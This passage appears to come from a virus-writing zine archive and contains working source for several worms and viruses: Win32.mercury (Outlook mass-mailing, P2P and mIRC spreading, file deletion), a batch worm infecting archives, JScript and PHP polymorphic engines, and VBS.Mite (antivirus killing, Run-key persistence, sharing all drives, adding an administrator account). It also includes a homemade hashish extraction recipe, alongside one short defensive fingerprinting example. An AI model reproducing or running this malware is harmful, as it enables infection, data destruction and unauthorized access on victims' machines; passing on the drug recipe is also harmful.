"c:\windows\screensaver.exe" KaZaA3 = "c:\program files\kazaa\my shared folder\IPspoofer.exe" bear = "c:\program files\bearshare\shared\IPspoofer.exe" e = "c:\program files\eDonkey2000\incoming\IPspoofer.exe" KaZaA4 = "c:\program files\kazaa\my shared folder\Virtual Sex Simulator.exe" bear2 = "c:\program files\bearshare\shared\Virtual Sex Simulator.exe" e2 = "c:\program files\eDonkey2000\incoming\Virtual Sex Simulator.exe" FileCopy aa, b FileCopy a, b FileCopy aa, c FileCopy a, c FileCopy aa, d FileCopy a, d FileCopy aa, e FileCopy a, e FileCopy aa, f FileCopy a, f FileCopy aa, KaZaA3 FileCopy a, KaZaA3 FileCopy aa, bear FileCopy a, 
bear FileCopy aa, e FileCopy a, e FileCopy aa, KaZaA4 FileCopy a, KaZaA4 FileCopy aa, bear2 FileCopy a, bear2 FileCopy aa, e2 FileCopy a, e2 FileCopy aa, Screen FileCopy a, Screen SetAttr d, vbHidden + vbReadOnly JumpNextCode: End Sub Sub outlook() On Error Resume Next Dim RndSub, RndSub1 As String Dim unin, taskman, av, ska, punk, a, b, c, d, f, g Randomize RndSub = Int((Rnd * 3) + 1) If RndSub = 1 Then RndSub1 = "Update your Anti-Virus Software!" If RndSub = 2 Then RndSub1 = "Update your virus defenitions (DAT files)!" If RndSub = 3 Then RndSub1 = "1 month ago you updated your Anti-Virus software!" unin = "c:\Program Files\uninstall.exe" taskman = "c:\WINDOWS\taskman.exe" av = "c:\Windows\System\AVupdate.exe" punk = Array(unin, taskman, av) Randomize ska = punk(Int(Rnd * 3)) Set a = CreateObject("Outlook.Application") Set b = a.getnamespace("MAPI") If a = "Outlook" Then b.Logon "profile", "password" For f = 1 To b.addresslists.Count For d = 1 To b.addresslists(f).addressentries.Count With a.createitem(69 - 69) Set g = b.addresslists(f).addressentries(d) .Recipients.Add g .Subject = RndSub1 .body = "Use our automatic updater (included in this e-mail) to get the latest virus database files needed to detect new virus such as BugBear (aka Tanatos), Opasoft (Opaserv)!" 
.Attachments.Add ska .send End With g = "" Next d Next f b.logoff End If End Sub Sub ModifyReg() On Error Resume Next Dim RegEdit Set RegEdit = CreateObject("WScript.Shell") 'Just to make sure that the user is sharing his stuff RegEdit.RegWrite "HKEY_CURRENT_USER\Software\Kazaa\LocalContent\DisableSharing", "0x00000000 (0)", "REG_DWORD" 'Set the share dir to that dir we copied ourself to RegEdit.RegWrite "HKEY_CURRENT_USER\Software\Kazaa\Transfer\DlDir0", KaZaADir 'KaZaA has a lame virus scanner built in, that easy can be disabled 'by writing to the registry RegEdit.RegWrite "HKEY_CURRENT_USER\Software\Kazaa\Advanced\ScanFolder", "0x00000000 (0)", "REG_DWORD" End Sub Sub pr0n() On Error Resume Next 'This function is here to delete any form of child abuse 'Altho it will delete all jpg, mpg, bmp and avi if there is 'child abuse applications under the formats it will be deleted. 'Who ever said a virus was a bad thing?!?!?! Open "c:\pr0n.bat" For Output As #2 Print #2, "@Echo Off" Print #2, "@cd C:\Program Files\Kazaa\My Shared Folder\" Print #2, "@del *.jpg" Print #2, "@del *.mpg" Print #2, "@del *.bmp" Print #2, "@del *.avi" Print #2, "@cd c:\program files\bearshare\shared\" Print #2, "@del *.jpg" Print #2, "@del *.mpg" Print #2, "@del *.bmp" Print #2, "@del *.avi" Print #2, "@cd c:\program files\eDonkey2000\incoming\" Print #2, "@del *.jpg" Print #2, "@del *.mpg" Print #2, "@del *.bmp" Print #2, "@del *.avi" Close #2 Shell ("C:\pr0n.bat") Kill ("C:\pr0n.bat") End Sub Sub mIRC() On Error Resume Next Dim FSO, mIRC1, mIRC2, mIRC3, mIRC4, mIRCDir As String Set FSO = CreateObject("Scripting.FileSystemObject") 'FSO Object mIRC1 = "C:\mIRC\" 'Just a possible dir mIRC2 = "C:\mIRC32\" mIRC3 = "C:\Program Files\mIRC\" mIRC4 = "C:\Program Files\mIRC32\" If FSO.FolderExists(mIRC1) = True Then mIRCDir = mIRC1 If FSO.FolderExists(mIRC2) = True Then mIRCDir = mIRC2 If FSO.FolderExists(mIRC3) = True Then mIRCDir = mIRC3 If FSO.FolderExists(mIRC4) = True Then mIRCDir = mIRC4 If 
mIRCDir <> "" Then GoTo WriteScript Else GoTo RunNextCode WriteScript: Open mIRCDir & "Script.ini" For Output As #3 Print #3, "n1= on 1:JOIN:#:{" Print #3, "n2= /if ( $nick == $me ) { halt }" Print #3, "n3= /msg $nick Hi want a cool screen saver?" Print #3, "n4= /dcc send -c $nick c:\Windows\screensaver.exe" Print #3, "n5= }" Print #3, "n6= on 1:quit:{" Print #3, "n7= /ame is infected with Win32.mercury@mm by Industry" Print #3, "n8= }" Print #3, "n9= on 1:text:*:#:{" Print #3, "n9= /msg $chan $2-" Print #3, "n10= }" Print #3, "n11= on 1:text:*no*:#:/quit $nick i say yes! (Win32.mercury@mm by Industry)" Close #3 RunNextCode: End Sub Sub bt() On Error Resume Next If Month(Now) = 12 And Day(Now) = 31 Then MsgBox "...Saving the world before bed time...", 64, "Win32.mercury@mm" End If If Month(Now) = 2 And Day(Now) = 16 Then MsgBox "...Win32.mercury Coded by Industry @ ANVXgroup...", 64, "Win32.mercury@mm" End If If Month(Now) = 4 And Day(Now) = 2 Then MsgBox "...Shout out to Every one @ Indovirus...", 64, "Win32.mercury@mm" End If End Sub 'Win32.mercury@mm by Industry 'Respect to mANiAC89 (aka SpiderMan) 'And Every one else @ Indovirus & b8

sources

verchocha Industry verchocha by Industry @echo off if exist c:\Windows\Explorer.exe copy %0 c:\Windows\Exp.bat cd C:\Windows\ echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 010110101011101010 BLANK CODE 01001011101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101011 rRlf 010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 010110101011101 ppacket 10101101010101101010110101010111001 >>Explorer.exe echo 01 Dolomite 10101011101010101101010101101010110101010111001 >>Explorer.exe echo 010110101011101010111010101011010101011010101 adious 111001 >>Explorer.exe echo 01011010101110101011101 Energy 1010101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 010110 Writen By Industry 101011101010101101010101101010101 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 0101101010111010101110101010110101010110 dr.g0nZo 010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 0101101010111010101110 assassin007 101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 0101101010111010101110101010110101010 philet0ast3r 10111001 >>Explorer.exe echo 01011010 El DudErin0 01010101101010101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 010110101011101010111010101 Zed 010101101010110101010111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 
010110101011101010111010101011010101011010 Verchocha 111001 >>Explorer.exe echo 01011010101110101011101010101101010101101010110101010111001 >>Explorer.exe echo 010 disk0rdia 101011101010101101010101101010110101010111001 >>Explorer.exe echo 0101101010111010101110101 Second Part To Hell 0101010111001 >>Explorer.exe cd ..\Local Settings\Application Data\Microsoft\CD Burning\ copy %0 Setup.bat cd C:\ if "%1=="#r goto rar if "%1=="#z goto zip if "%1=="#a goto arj for %%r in (*.rar) do call %0 #r %%r for %%z in (*.zip) do call %0 #z %%z for %%a in (*.arj) do call %0 #a %%a goto cont :rar attrib -r %2 rar a -tk -y -c- -o+ %2 %0 >nul goto cont :zip attrib -r %2 pkzip %2 %0 >nul goto cont :arj attrib -r %2 arj a %2 %0 >nul :cont mkdir _ copy %0 C:\_\_.bat copy %0 C:\_\_.dev if exist C:\AutoExec.bat goto auto :auto echo @echo off >>AutoExec.bat >>AutoExec.bat echo copy C:\_\_.dev A:\_.bat >>AutoExec.bat goto mail :mail cd C:\_\ echo On Error Resume Next >>mail_.vbs echo dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad >>mail_.vbs echo set regedit=CreateObject("WScript.Shell") >>mail_.vbs echo set out=WScript.CreateObject("Outlook.Application") >>mail_.vbs echo set mapi=out.GetNameSpace("MAPI") >>mail_.vbs echo for ctrlists=1 to mapi.AddressLists.Count >>mail_.vbs echo set a=mapi.AddressLists(ctrlists) >>mail_.vbs echo x=1 >>mail_.vbs echo regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) >>mail_.vbs echo if (regv="") then >>mail_.vbs echo regv=1 >>mail_.vbs echo end if >>mail_.vbs echo if (int(a.AddressEntries.Count)> int(regv)) then >>mail_.vbs echo for ctrentries=1 to a.AddressEntries.Count >>mail_.vbs echo malead=a.AddressEntries(x) >>mail_.vbs echo regad="" >>mail_.vbs echo regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) >>mail_.vbs echo if (regad="") then >>mail_.vbs echo set male=out.CreateItem(0) >>mail_.vbs echo male.Recipients.Add(malead) >>mail_.vbs echo male.Subject = "SOLUTION: [TICK] -USA-P3-CaseID 4327120063 - 
Virus Undetected-IZ61499" >>mail_.vbs echo male.Body = "The Information & Patch for IZ61499 is attatched." >>mail_.vbs echo rem male.Attachments.Add("C:\_\_.bat") >>mail_.vbs echo male.Send >>mail_.vbs echo regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" >>mail_.vbs echo end if >>mail_.vbs echo x=x+1 >>mail_.vbs echo next >>mail_.vbs echo regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count >>mail_.vbs echo else >>mail_.vbs echo regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count >>mail_.vbs echo end if >>mail_.vbs echo next >>mail_.vbs echo Set out=Nothing >>mail_.vbs echo Set mapi=Nothing >>mail_.vbs :irc cd C:\_\ echo on error resume next >>_.vbs echo Set fso = CreateObject("Scripting.FileSystemObject") >>_.vbs echo Set b = fso.CreateTextFile("c:\program files\mirc\script.ini", True) >>_.vbs echo b.WriteLine "[script]" >>_.vbs echo b.WriteLine "ON 1:JOIN:#:{" >>_.vbs echo b.WriteLine "/dcc send $nick c:\_\_.bat" >>_.vbs echo b.WriteLine "}" >>_.vbs echo b.close >>_.vbs echo Set fso = CreateObject("Scripting.FileSystemObject") >>_.vbs echo Set a = fso.CreateTextFile("c:\mirc\script.ini", True) >>_.vbs echo a.WriteLine "[script]" >>_.vbs echo a.WriteLine "ON 1:JOIN:#:{" >>_.vbs echo a.WriteLine "/dcc send $nick c:\_\_.bat" >>_.vbs echo a.WriteLine "}" >>_.vbs echo a.close >>_.vbs

articles

kefi's iso-hash Kefi kefi's iso-hash "something for the children..." by kefi kefi's iso-hash "something for the children..." hello everyone – you probably haven't heard much of me lately. i've been going through some "real-life" shit that (still) needs to be sorted out, so i haven't had much time to attribute anything to this scene. this time, i have something for you that has nothing to do with vx at all. if you do not smoke weed, you may as well close this document right now. a few days ago, i was introduced to something amazing – (easily) homemade hashish. by using few household products, you can have your own! here's what you'll need: one (clean) glass jar with an attachable lid; one bottle of rubbing alcohol (70% isopropyl); a few coffee filters; a plate or glass pan which isn't too important; weed and/or leaves; and lastly, a razor blade. by the way, the better quality of weed you use, the better hash you will be left with. once you have all of these things, you're ready to get started ... first, take your weed (or leaves) and crush it all up. breaking it up is not necessary and you do not want it to be too small. now take your weed and place it into the bottom of the jar. pour the rubbing alcohol into the jar (fill it about 4 cm above weed). now tightly put the lid on the jar and shake it for ~3 minutes. let this substance sit in the jar for another few minutes while you smoke a cigarette. now get your plate and coffee filters ready. stack four coffee filters on top of each other and place them on the plate. now pour the substance (weed & alcohol) into the filters. be sure to fold the sides of the filters up so nothing leaks out the top. let all of the liquid drain out of the coffee filters. this may take some time, so have something else to do while you wait. once all of the liquid has drained through the filters, throw the weed and filters in the garbage. (or sell the weed so someone stupid. ;p) of course, more waiting is involved. 
place the plate somewhere safe and let all of the liquids evaporate off of it. now scrape the substance off of the plate with a razor blade. what's left, depending what you used (weed, leaves, etc.), you will end up with one of the following results: something like a long stick of candy - very sticky and greenish-black in color (this is the best form); or a very dry powder. if your result was the powder, you will not be able to (easily) smoke this. don't worry though! if you do the following, everything will be okay ... take the powder and put it inside cellophane (plastic wrapper) from a cigarette pack. fold the cellophane and make it as small as possible. now tape the cellophane closed. then place the cellophane in the heel of your shoe and walk on it for about an hour. and voila - you have a solid piece of delicious hash. next time you have a lot of bad weed, leaves or stems, make your self some hash. this method has a great high and does not have the potential of blowing up your home.

sources

kefi's jscript poly [kjp]
Kefi

kefi's jscript poly [kjp] (c) by kefi, April 17, 2003

.Hello, everybody! It's probably been a while since you've heard from me. If so, don't feel bad. I've been rather inactive in the scene lately as I've got a lot of personal problems to deal with...

.Since chances are, you're a silly script-kitty (no offence), I need to include a disclaimer in here. If you're a stupid ass, and you spread a virus which uses my engine, I will hold no responsibility for it. Nor will you ever accomplish anything other than irritating me. In other words, "don't be a lame bastard."

.Anyway, I'm glad you've decided to check out my new polymorphic engine! It's my favorite one so far. :] Basically a re-make of kvpe, my vbs poly, but it's for javascript instead. At the time of writing this, I had thought that it was the first of its kind, however, later on Second Part To Hell (hello!) said that jackie had made one before me ... so, "good job, jackie! you beat me to it!" So, anyway, this thing's got to be the coolest js polymorphic engine, as it's small (7 lines), fast, and easy to understand (if you have some prior knowledge of javascript, of course). How it works is it loops through an array of variables which you have in your script, then generates a new, randomly created variable. After it's got its new variable, it searches for it within your virus's code and replaces the original variable with the new one. To really understand it, I suggest you just play with it for a while, I'm sure you'll understand it.

.Now, in order to use this poly, you'll need to gather all your code, and then make a call to the engine, then write the new stuff. Here's a really small, easy way to do this (uses the FileSystemObject ... ack):

var objFso = new ActiveXObject("scripting.filesystemobject"); var theCode = kjp(objFso.opentextfile(WScript.scriptfullname, 1).readall()); objFso.opentextfile(WScript.scriptfullname, 2).write(theCode);
...

You should understand that, if not, don't use my poly. :]

.Well, that's all I've got to say about this thing, so once again, thank you for readin' about it, and if you've got any comments, questions, flames, or whatever contact me:
http -- http://vx.netlux.org/~kefi/
email -- kefi@jwdx.com

.Credits go out to:
jackie -- Making the first js-poly, good job, I guess!
Second Part To Hell -- Thanks for all your javascript help and telling me about jackie's poly!

(c) by Kefi, April 17, 2003 // kefi@jwdx.com // vx.netlux.org/~kefi
Note: minor formatting and changes in the text occurred on: October 3rd, 2003

.---------------------------------[jscript poly]----------------------------------.
function kjp(a1){ a2 = new Array("kjp", "a1", "a2", "a3", "a4", "a5", "a6", "a7"); for(a3 in a2){ a4 = ""; for(a5 = 0; a5 < Math.round(Math.random() * 6) + 4; a5++) a4 += String.fromCharCode(Math.round(Math.random() * 22) + 97); for(var a6 = 0; a6 < a1.length; a6++) a1 = a1.replace(a2[a3], a4); } return(a1); }
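Seen from the detection side, as an added example that is not part of kefi's article or engine: an engine that only swaps names from a fixed table for random letters leaves the token structure untouched, so mapping every renameable identifier to a positional placeholder gives each generation the same skeleton. The KEEP list, the function names and the harmless sample scripts below are all constructed for this illustration.

```javascript
// Added example: fingerprint a script so that identifier renaming does not change it.
// Everything here (names, KEEP list, samples) is constructed for illustration.

// Tokens a renamer cannot touch without breaking the script: keywords and host globals.
const KEEP = new Set([
  "function", "var", "let", "const", "for", "in", "if", "else", "return",
  "new", "while", "do", "this", "typeof", "true", "false", "null",
  "Array", "Math", "String", "Number", "Object", "WScript", "ActiveXObject",
]);

// Comments, string literals, identifiers, numbers, whitespace, then any single character.
// Assumption: regex literals and template strings do not occur in the sample.
const TOKEN = /\/\/[^\n]*|\/\*[\s\S]*?\*\/|"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'|[A-Za-z_$][\w$]*|\d+(?:\.\d+)?|\s+|[^\s]/g;
const IDENT = /^[A-Za-z_$][\w$]*$/;

// Split the source into tokens, dropping whitespace and comments.
function tokenize(source) {
  return (source.match(TOKEN) || []).filter(
    (tok) => !/^\s+$/.test(tok) && !tok.startsWith("//") && !tok.startsWith("/*")
  );
}

// An identifier is renameable when it is not a keyword/global and not a member name (x.length).
function isRenameable(tokens, i) {
  return IDENT.test(tokens[i]) && !KEEP.has(tokens[i]) && tokens[i - 1] !== ".";
}

// Replace each renameable identifier with v0, v1, ... in order of first appearance.
function normalize(source) {
  const tokens = tokenize(source);
  const renameable = new Set(tokens.filter((_, i) => isRenameable(tokens, i)));
  const placeholder = new Map();
  const nameFor = (id) => {
    if (!placeholder.has(id)) placeholder.set(id, "v" + placeholder.size);
    return placeholder.get(id);
  };
  return tokens
    .map((tok, i) => {
      if (isRenameable(tokens, i)) return nameFor(tok);
      const inner = tok.slice(1, -1);
      // A renaming engine that carries its own name table as strings rewrites those
      // strings too, so a literal that spells a renameable name is mapped as well.
      if ((tok[0] === '"' || tok[0] === "'") && tok.length >= 2 && renameable.has(inner)) {
        return '"' + nameFor(inner) + '"';
      }
      return tok;
    })
    .join(" ");
}

// 32-bit FNV-1a keeps the example dependency-free; a production pipeline would
// hash the skeleton with SHA-256 or feed it to a fuzzy hash instead.
function fnv1a(text) {
  let h = 0x811c9dc5;
  for (let i = 0; i < text.length; i++) {
    h ^= text.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h.toString(16).padStart(8, "0");
}

function fingerprint(source) {
  return fnv1a(normalize(source));
}

// Constructed, harmless samples: B is A with every name swapped for random letters,
// C changes one operator and must not produce the same skeleton as A.
const SAMPLE_A = 'function total(items){ names = new Array("total", "items", "names", "sum", "i"); ' +
  'sum = 0; for(i = 0; i < items.length; i++) sum += items[i]; return(sum); }';
const SAMPLE_B = 'function qhzke(mvtarb){ xodlw = new Array("qhzke", "mvtarb", "xodlw", "pfjuyc", "tbnqs"); ' +
  'pfjuyc = 0; for(tbnqs = 0; tbnqs < mvtarb.length; tbnqs++) pfjuyc += mvtarb[tbnqs]; return(pfjuyc); }';
const SAMPLE_C = SAMPLE_A.replace("+=", "-=");

console.log(fingerprint(SAMPLE_A), fingerprint(SAMPLE_B), fingerprint(SAMPLE_C));
```

The table of names that such an engine needs in order to find its own variables in the next generation is itself an invariant: an array of string literals that all reappear as identifiers survives every rename.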


php.faces Kefi php.faces by Kefi (c) early October, 2003 .faces is the first polymorphic php virus. it uses the never-before-seen poly engine, "kppe," which stands for "kefi's php polymorph engine." faces is like most other php viruses in it's "main code" where it finds victim files with the extension of "php" from the current directory which do not contain the string, "php.faces." if the file contains the string, it will be skipped, however, if it does not, faces will add it's newly morphed 1,240 bytes of code to the beginning of the victim file. .written as a lame "concept virus," so everything's simple and easy ... as it should be. =) .thanks Negral -- php.Zodar; I based my code off of it. Xmorfic and Ultras -- very nice php viruses (php.ALF and NewWord)! Symantec -- giving horrible reports (as usual) of every php virus out there. keep up the good work, guys! .-------------------------------[php.faces]--------------------------------. <?php $ypxqrpsqcc = fopen(__FILE__, "r"); $bbugesqpty = substr(fread($ypxqrpsqcc, filesize(__FILE__)), 0, 1249); fclose($ypxqrpsqcc); $dhbpgxtamn = array("ypxqrpsqcc", "bbugesqpty", "dhbpgxtamn", "cctsvcopcx", "wurwejtvjx", "ccznwozuuo", "uudxleoyja", "ionwdbkwfh", "zohqscoxob", "skzmabzbfe"); for($cctsvcopcx = 0; $cctsvcopcx <count($dhbpgxtamn); $cctsvcopcx++){ $wurwejtvjx = chr(rand(97, 122)); for($ccznwozuuo = 0; $ccznwozuuo <9; $ccznwozuuo++) $wurwejtvjx = $wurwejtvjx . chr(rand(97, 122)); $bbugesqpty = str_replace("$dhbpgxtamn[$cctsvcopcx]", "$wurwejtvjx", "$bbugesqpty"); } $uudxleoyja = opendir("."); while(false !== ($ionwdbkwfh = readdir($uudxleoyja))){ if($ionwdbkwfh != "." 
&& $ionwdbkwfh != ".."){ if(substr($ionwdbkwfh, -3) == "php"){ $zohqscoxob = fopen($ionwdbkwfh, "r"); $skzmabzbfe = substr(fread($zohqscoxob, filesize($ionwdbkwfh)), 5); fclose($zohqscoxob); if(!strstr($skzmabzbfe, "php.faces")){ unlink("$ionwdbkwfh"); $zohqscoxob = fopen($ionwdbkwfh, "a+"); fwrite($zohqscoxob, "$bbugesqpty"); fwrite($zohqscoxob, "$skzmabzbfe"); fclose($zohqscoxob); } } } } closedir($uudxleoyja); // php.faces (c) by Kefi, 2003 ?>


VBS.Mite (ver. 1.0) MYSTiQUE ' VBS.Mite by MYSTiQUE [rRlf] ver. 1.0 on error resume next dim fso, myst, virus, language, Accessories Set myst = CreateObject("Wscript.Shell") set FSO=createobject("scripting.filesystemobject") Set fl = fso.OpenTextFile(WScript.ScriptFullName, 1) virus = fl.ReadAll fl.Close CheckLang() sub CheckLang() If Month(Now()) = 12 And Day(Now()) = 31 Then myst.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SM_AccessoriesName") if Accessories="Ñòàíäàðòíûå" then fso.deletefile wscript.scriptfullname end if end if end sub Task() Sub Task() myst.run"taskkill /f /im drweb32w.exe",0 myst.run"taskkill /f /im drwebupw.exe",0 myst.run"taskkill /f /im drwebwcl.exe",0 myst.run"taskkill /f /im drweb386.exe",0 myst.run"taskkill /f /im SCAN.EXE",0 myst.run"taskkill /f /im NOD32.EXE",0 myst.run"taskkill /f /im NAVWNT.EXE",0 myst.run"taskkill /f /im NAVW32.EXE",0 myst.run"taskkill /f /im ZONEALARM.EXE",0 myst.run"taskkill /f /im TASKMON.EXE",0 myst.run"taskkill /f /im REGEDIT.EXE",0 myst.run"taskkill /f /im REGEDIT32.EXE",0 myst.run"taskkill /f /im OUTPOST.EXE",0 myst.run"taskkill /f /im NPROTECT.EXE",0 myst.run"taskkill /f /im SPIDER.VXD",0 myst.run"taskkill /f /im AVPM.EXE",0 myst.run"taskkill /f /im Norton.EXE",0 myst.run"taskkill /f /im Mcafee.EXE",0 myst.run"taskkill /f /im Sophos.exe",0 myst.run"taskkill /f /im F-PROT.EXE",0 End Sub 'Thanks to [K]Alamar for antideletion function AntiDeletion() Sub AntiDeletion() Set fso = CreateObject("scripting.filesystemobject") Set fuck = fso.opentextfile(wscript.scriptfullname, 1) vir = fuck.readall fuck.Close Do If Not (fso.fileexists(wscript.scriptfullname)) Then Set fuck = fso.createtextfile(wscript.scriptfullname, True) fuck.write vir fuck.Close End If Loop End Sub InstalltoWindows() Sub InstalltoWindows() fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(0)+"\DrWeb.vbs" Set f = fso.GetFile(fso.GetSpecialFolder(0)&"\DrWeb.vbs") f.attributes = f.attributes + 2 
myst.regwrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SPIDERNT",fso.GetSpecialFolder(0)+"\DrWeb.vbs" End sub InstalltoSystem() Sub InstalltoSystem() fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(1)+"\DrWebUpdate.vbs" Set f = fso.GetFile(fso.GetSpecialFolder(1)&"\DrWebUpdate.vbs") f.attributes = f.attributes + 2 myst.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Regedit",fso.GetSpecialFolder(1)+"\DrWebUpdate.vbs" End sub InstalltoSystem2() Sub InstalltoSystem2() fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(1)+"\Backup.vbs" Set f = fso.GetFile(fso.GetSpecialFolder(1)&"\Backup.vbs") f.attributes = f.attributes + 2 myst.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Regedit",fso.GetSpecialFolder(1)+"\Backup.vbs" End Sub InstalltoTemp() Sub InstalltoTemp() fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(2)+"\Ctfmon.vbs" Set f = fso.GetFile(fso.GetSpecialFolder(2)&"\Ctfmon.vbs") f.attributes = f.attributes + 2 myst.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Ctfmon",fso.GetSpecialFolder(2)+"\Ctfmon.vbs" End sub OpenDriVe() Sub OpenDriVe() myst.run"net share f=f:\",0 myst.run"net share c=c:\",0 myst.run"net share d=d:\",0 myst.run"net share e=e:\",0 myst.run"net share g=g:\",0 myst.run"net share h=h:\",0 myst.run"net share i=i:\",0 myst.run"net share j=j:\",0 myst.run"net share k=k:\",0 myst.run"net share l=l:\",0 myst.run"net share m=m:\",0 myst.run"net share n=n:\",0 myst.run"net share o=o:\",0 myst.run"net share p=p:\",0 myst.run"net share q=q:\",0 myst.run"net share r=r:\",0 myst.run"net share s=s:\",0 myst.run"net share t=t:\",0 myst.run"net share u=u:\",0 myst.run"net share v=v:\",0 myst.run"net share w=w:\",0 myst.run"net share x=x:\",0 myst.run"net share y=y:\",0 myst.run"net share z=z:\",0 myst.regwrite"HKEY_CLASSES_ROOT\Network\SharingHandler\","" End sub NoDanger() Sub NoDanger() myst.regwrite"HKLM\SOFTWARE\Microsoft\Internet 
Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown\IExplorer","0","REG_DWORD" End sub NewAdmin() Sub NewAdmin() myst.run"net user Administrator MYSTiQUE /add",0 myst.run"net localgroup administrators /add admin",0 End Sub msT() Sub msT() myst.regwrite "HKCU\software\TheMite\", "VBS.Mite by MYSTiQUE [rRlf]" End Sub NetworkSpreading() Sub NetworkSpreading(FileName) On Error Resume Next Set fso=CreateObject("Scripting.FileSystemObject") Set Network = CreateObject("WScript.Network") Set Shares = Network.EnumNetworkDrives Set Wormmm = fso.GetFile(WScript.ScriptFullName) Wormmm.Copy(fso.GetSpecialFolder(0)&"\NetWork.txt.vbs") If Shares.Count > 0 Then Set FSO = CreateObject("Scripting.FileSystemObject") For Counter1 = 0 To Shares.Count - 1 If Shares.Item(Counter1) <> "" Then FSO.CopyFile Wormmm, FSO.BuildPath(Shares.Item(Counter1), FileName) Next Set FSO = Nothing End If Set Shares = Nothing Set Network = Nothing End Sub Folder() Sub Folder() On Error Resume Next Set myst = CreateObject("Wscript.Shell") Set FSO = CreateObject("Scripting.FileSystemObject") Desktop = myst.SpecialFolders("AllUsersDesktop") StartMenu = myst.SpecialFolders("AllUsersStartMenu") Programs = myst.SpecialFolders("AllUsersPrograms") StartUp = myst.SpecialFolders("AllUsersStartUp") MyDocuments = myst.SpecialFolders("MyDocumets") SendTo = myst.SpecialFolders("SendTo") Recent = myst.SpecialFolders("Recent") Favorites = myst.SpecialFolders("Favorites") Templates = myst.SpecialFolders("Templates") fso.copyfile Wscript.ScriptFullName, SendTo & "\re; answer me.vbs" fso.copyfile Wscript.ScriptFullName, StartMenu & "\win log.vbs" fso.copyfile Wscript.ScriptFullName, Recent & "\fss vs. cia.vbs" fso.copyfile Wscript.ScriptFullName, Favorites & "\AdminPages whitehouse.lnk. 
vbs" fso.copyfile Wscript.ScriptFullName, Dektop & "\open Me.vbs" fso.copyfile wscript.scriptfullname, Templates & "\Word.vbs" fso.copyfile Wscript.Scriptfullname, Mydocuments & "\ReadMe.txt.vbs" fso.copyfile wscript.scriptfullname, Startup & "\kernel32.dll.vbs" Set f = fso.GetFile(fso.GetSpecialFolder(0)&"\kernel32.dll.vbs") f.attributes = f.attributes + 2 fso.copyfile wscript.scriptfullname, Programs & "\drweb.vbs" end sub payload() sub payload() if day(now())=20 then myst.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\disabletaskmgr","1","REG_DWORD" myst.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\disableregistrytools","1","REG_DWORD" myst.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","Fucking Toilet" myst.regwrite"HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR\Start","4","REG_DWORD" myst.regwrite"HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown\IExplorer","0","REG_DWORD" end if end sub infectfile() Sub infectfile() On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set drv = fso.Drives For Each d In drv If d.DriveType = 2 Or d.DriveType = 3 Then list(d.path&"\") End If Next End Sub Sub list(doss) On Error Resume Next Set fso = CreateObject("Scripting.FileSystemObject") Set fold = fso.GetFolder(doss) Set yebjp = fold.SubFolders For Each f1 In yebjp infect(f1.Path) list(f1.Path) Next End Sub Sub infect(doss) On Error Resume Next Set mst = CreateObject("Scripting.FileSystemObject") Set lxxj = mst.GetFolder(doss) Set fc = lxxj.Files For Each f1 In fc ext = fso.GetExtensionName(f1.Path) ext = lCase(ext) If (ext = "vbs") or (ext = "vbe") or (ext = "vdb") Then Set cot = fso.OpenTextFile(f1.Path, 1, False) If cot.ReadLine <> "'ohuenno pizdatiy virus" Then cot.Close Set cot = fso.OpenTextFile(f1.Path, 1, False) vbsorg = cot.ReadAll() cot.Close Set inf = fso.OpenTextFile(f1.Path, 2, True) inf.WriteLine virus 
